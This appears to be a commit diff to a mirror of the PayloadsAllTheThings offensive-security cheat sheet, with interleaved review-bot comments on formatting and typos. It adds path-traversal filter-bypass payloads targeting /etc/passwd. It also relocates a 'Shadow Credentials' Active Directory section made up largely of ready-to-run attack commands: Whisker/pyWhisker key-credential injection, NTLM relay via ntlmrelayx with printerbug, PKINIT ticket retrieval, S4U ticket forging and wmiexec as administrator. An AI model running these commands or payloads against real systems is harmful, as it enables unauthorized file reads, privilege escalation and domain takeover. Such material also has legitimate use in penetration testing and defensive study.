mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-18 01:15:25 +00:00
Shadow Credentials
parent e386a110d9
commit 835d6fffe0
8 .github/hopla_config.json vendored
@ -315,6 +315,14 @@
"name": "Filter Bypass 2",
"value": "..///////..////..//////etc/passwd"
},
{
"name": "Filter Bypass 3",
"value": "...//...//etc/passwd"
},
{
"name": "Filter Bypass 4",
"value": "%252f..%252f..%252f..%252f..%252fetc/passwd"
},
{
"name": "Filter Bypass 3",
"value": "/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
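Review bot: the last added entry, `"name": "Filter Bypass 3"`, reuses the name of the `...//...//etc/passwd` entry two objects above, so the new `/%5C../...` payload is indistinguishable from it in the picker; give it a distinct name (the sequence suggests "Filter Bypass 5"). This file is also flagged as vendored, so confirm it is meant to be edited by hand rather than regenerated.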
@ -58,7 +58,6 @@
- [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets)
- [Kerberoasting](#kerberoasting)
- [KRB_AS_REP Roasting](#krbasrep-roasting)
- [Shadow Credentials](#shadow-credentials)
- [Pass-the-Hash](#pass-the-hash)
- [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
- [Using impacket](#using-impacket)
@ -85,6 +84,7 @@
- [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
- [Certifried CVE-2022-26923](#certifried-cve-2022-26923)
- [Pass-The-Certificate](#pass-the-certificate)
- [Shadow Credentials](#shadow-credentials)
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
- [Abusing DNS Admins Group](#abusing-dns-admins-group)
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
@ -1837,68 +1837,6 @@ C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproa
* All accounts must have "Kerberos Pre-Authentication" enabled (Enabled by Default).


### Shadow Credentials

> Add **Key Credentials** to the attribute `msDS-KeyCredentialLink` of the target user/computer object and then perform Kerberos authentication as that account using PKINIT to obtain a TGT for that user.

:warning: User objects can't edit their own `msDS-KeyCredentialLink` attribute while computer objects can. Computer objects can edit their own msDS-KeyCredentialLink attribute but can only add a KeyCredential if none already exists

**Requirements**:
* Domain Controller on (at least) Windows Server 2016
* PKINIT Kerberos authentication
* An account with the delegated rights to write to the `msDS-KeyCredentialLink` attribute of the target object

**Exploitation**:
- From Windows, use [Whisker](https://github.com/eladshamir/Whisker):
```powershell
# Lists all the entries of the msDS-KeyCredentialLink attribute of the target object.
Whisker.exe list /target:computername$
# Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device.
Whisker.exe add /target:"TARGET_SAMNAME" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /path:"cert.pfx" /password:"pfx-password"
Whisker.exe add /target:computername$ [/domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1]
# Removes a key credential from the target object specified by a DeviceID GUID.
Whisker.exe remove /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /remove:2de4643a-2e0b-438f-a99d-5cb058b3254b
```

- From Linux, use [pyWhisker](https://github.com/ShutdownRepo/pyWhisker):
```bash
# Lists all the entries of the msDS-KeyCredentialLink attribute of the target object.
python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "list"
# Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device.
pywhisker.py -d "FQDN_DOMAIN" -u "user1" -p "CERTIFICATE_PASSWORD" --target "TARGET_SAMNAME" --action "list"
python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "add" --filename "test1"
# Removes a key credential from the target object specified by a DeviceID GUID.
python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "remove" --device-id "a8ce856e-9b58-61f9-8fd3-b079689eb46e"
```

**Scenario**:

- Scenario: Shadow Credential relaying
- Trigger an NTLM authentication from `DC01` (PetitPotam)
- Relay it to `DC02` (ntlmrelayx)
- Edit `DC01`'s attribute to create a Kerberos PKINIT pre-authentication backdoor (pywhisker)
- Alternatively : `ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'`
- Scenario: Workstation Takeover with RBCD
```ps1
# Only for C2: Add Reverse Port Forward from 8081 to Team Server 81

# Set up ntlmrelayx to relay authentication from target workstation to DC
proxychains python3 ntlmrelayx.py -t ldaps://dc1.ez.lab --shadow-credentials --shadow-target ws2\$ --http-port 81

# Execute printer bug to trigger authentication from target workstation
proxychains python3 printerbug.py ez.lab/matt:Password1\!@ws2.ez.lab ws1@8081/file

# Get a TGT using the newly acquired certificate via PKINIT
proxychains python3 gettgtpkinit.py ez.lab/ws2\$ ws2.ccache -cert-pfx /opt/impacket/examples/T12uyM5x.pfx -pfx-pass 5j6fNfnsU7BkTWQOJhpR

# Get a TGS for the target account
proxychains python3 gets4uticket.py kerberos+ccache://ez.lab\\ws2\$:ws2.ccache@dc1.ez.lab cifs/ws2.ez.lab@ez.lab administrator@ez.lab administrator_tgs.ccache -v

# Utilize the TGS for future activity
export KRB5CCNAME=/opt/pkinittools/administrator_ws2.ccache
proxychains python3 wmiexec.py -k -no-pass ez.lab/administrator@ws2.ez.lab
```

### Pass-the-Hash

The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500.
@ -2594,6 +2532,71 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
```


### Shadow Credentials

> Add **Key Credentials** to the attribute `msDS-KeyCredentialLink` of the target user/computer object and then perform Kerberos authentication as that account using PKINIT to obtain a TGT for that user. When trying to pre-authenticate with PKINIT, the KDC will check that the authenticating user has knowledge of the matching private key, and a TGT will be sent if there is a match.

:warning: User objects can't edit their own `msDS-KeyCredentialLink` attribute while computer objects can. Computer objects can edit their own msDS-KeyCredentialLink attribute but can only add a KeyCredential if none already exists

**Requirements**:
* Domain Controller on (at least) Windows Server 2016
* Domain must have Active Directory `Certificate Services` and `Certificate Authority` configured
* PKINIT Kerberos authentication
* An account with the delegated rights to write to the `msDS-KeyCredentialLink` attribute of the target object

**Exploitation**:
- From Windows, use [Whisker](https://github.com/eladshamir/Whisker):
```powershell
# Lists all the entries of the msDS-KeyCredentialLink attribute of the target object.
Whisker.exe list /target:computername$
# Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device.
Whisker.exe add /target:"TARGET_SAMNAME" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /path:"cert.pfx" /password:"pfx-password"
Whisker.exe add /target:computername$ [/domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1]
# Removes a key credential from the target object specified by a DeviceID GUID.
Whisker.exe remove /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /remove:2de4643a-2e0b-438f-a99d-5cb058b3254b
```

- From Linux, use [pyWhisker](https://github.com/ShutdownRepo/pyWhisker):
```bash
# Lists all the entries of the msDS-KeyCredentialLink attribute of the target object.
python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "list"
# Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device.
pywhisker.py -d "FQDN_DOMAIN" -u "user1" -p "CERTIFICATE_PASSWORD" --target "TARGET_SAMNAME" --action "list"
python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "add" --filename "test1"
# Removes a key credential from the target object specified by a DeviceID GUID.
python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "remove" --device-id "a8ce856e-9b58-61f9-8fd3-b079689eb46e"
```

**Scenario**:

- **Scenario 1**: Shadow Credential relaying
- Trigger an NTLM authentication from `DC01` (PetitPotam)
- Relay it to `DC02` (ntlmrelayx)
- Edit `DC01`'s attribute to create a Kerberos PKINIT pre-authentication backdoor (pywhisker)
- Alternatively : `ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'`

- **Scenario 2**: Workstation Takeover with RBCD
```ps1
# Only for C2: Add Reverse Port Forward from 8081 to Team Server 81

# Set up ntlmrelayx to relay authentication from target workstation to DC
proxychains python3 ntlmrelayx.py -t ldaps://dc1.ez.lab --shadow-credentials --shadow-target ws2\$ --http-port 81

# Execute printer bug to trigger authentication from target workstation
proxychains python3 printerbug.py ez.lab/matt:Password1\!@ws2.ez.lab ws1@8081/file

# Get a TGT using the newly acquired certificate via PKINIT
proxychains python3 gettgtpkinit.py ez.lab/ws2\$ ws2.ccache -cert-pfx /opt/impacket/examples/T12uyM5x.pfx -pfx-pass 5j6fNfnsU7BkTWQOJhpR

# Get a TGS for the target account
proxychains python3 gets4uticket.py kerberos+ccache://ez.lab\\ws2\$:ws2.ccache@dc1.ez.lab cifs/ws2.ez.lab@ez.lab administrator@ez.lab administrator_tgs.ccache -v

# Utilize the TGS for future activity
export KRB5CCNAME=/opt/pkinittools/administrator_ws2.ccache
proxychains python3 wmiexec.py -k -no-pass ez.lab/administrator@ws2.ez.lab
```


### Dangerous Built-in Groups Usage

If you do not want modified ACLs to be overwritten every hour, you should change ACL template on the object `CN=AdminSDHolder,CN=System` or set `"dminCount` attribute to `0` for the required object.
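Review bot: the second pyWhisker line under the "Generates a public-private key pair and adds" comment, `pywhisker.py -d "FQDN_DOMAIN" -u "user1" -p "CERTIFICATE_PASSWORD" --target "TARGET_SAMNAME" --action "list"`, runs `list` instead of `add`, labels the authenticating user's password as a certificate password, and lacks the `python3` prefix the neighbouring lines use; either make it `--action "add"` with a plain `PASSWORD` placeholder or drop it, since the `--filename "test1"` line already shows the add. In the Whisker block `constoso.local` is a typo for `contoso.local` (twice), and the :warning: line ends without a period. The Scenario 2 block is fenced as `ps1` but holds Linux shell commands (`proxychains`, `export KRB5CCNAME=`), so `bash` is the right fence; its title says RBCD while the commands shown use shadow credentials plus S4U2self via `gets4uticket.py`, and the exported `/opt/pkinittools/administrator_ws2.ccache` does not match the `administrator_tgs.ccache` that the preceding `gets4uticket.py` line writes. The unchanged context line `"dminCount` is a pre-existing typo for `adminCount` worth fixing while this section is being touched.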
@ -3863,4 +3866,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [Certifried: Active Directory Domain Privilege Escalation (CVE-2022–26923) - Oliver Lyak](https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4)
* [bloodyAD and CVE-2022-26923 - soka - 11 May 2022](https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html)
* [DIVING INTO PRE-CREATED COMPUTER ACCOUNTS - May 10, 2022 - By Oddvar Moe](https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/)
* [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html)
* [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html)
* [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials)
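Review bot: the "How NOT to use the PAM trust" reference appears twice in this hunk with no visible difference between the two lines, which the `-3863,4 +3866,5` counts only explain as that line being removed and re-added, most likely a trailing-whitespace or line-ending change; drop that noise from the commit so the hunk shows only the new Shadow Credentials entry. The added entry itself follows the list's `[Title - Source](url)` style; the neighbouring entries also carry a date and author where the source gives one, so consider adding those for consistency.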